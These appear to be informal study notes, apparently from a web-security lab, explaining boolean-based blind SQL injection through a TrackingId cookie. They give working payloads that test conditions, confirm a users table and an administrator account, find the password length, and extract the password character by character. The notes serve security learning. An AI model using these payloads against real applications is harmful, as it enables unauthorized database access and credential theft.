understanding this by an eg:
a cookie is being used in a request. that cookie is Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4 When that id is sent to that analytics server it gets processed into a SQL query like SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
a query can be sent in the cookie. If a correct TrackingId is given, in the response a "Welcome back" message in shown.
In this TrackingId, blind SQL can be used. first testing the waters with some conditional statements like ' AND '1'='1 and ' AND '1'='2 . the former is true condition and the latter is false condition.
In the true condition, the "Welcome back" message is shown in the response but not in the false condition.
This allows us to extract data one piece at a time, by testing any single injected condition.
For e.g: In a table Users with the columns Username and Password, a user called Administrator . the password for the user can be found out, by sending a series of inputs to find one character at a time.
' AND (SELECT 'a' FROM users LIMIT 1)='a → to verify if there's a table called users
' AND (SELECT 'a' FROM users WHERE username='administrator')='a → to see if there’s a user called administrator
' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a → to find out the length of the password, just increasing that number 1 from anything till we not get the message in the response
‘ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a→to test in each position what’s the character is at that position in the password. payload position on a. and in the payloads section, a-z, 0-9 should be sent. and grep search if the welcome message is shown or not
After the first iteration, on whatever character it showed the Welcome message, that’s the first letter in the password. Now, change the request and increase the number to 2 like this -> ..SUBSTRING(password,2,1).. and the rest of the same. Like this, keep changing the number till the full password length.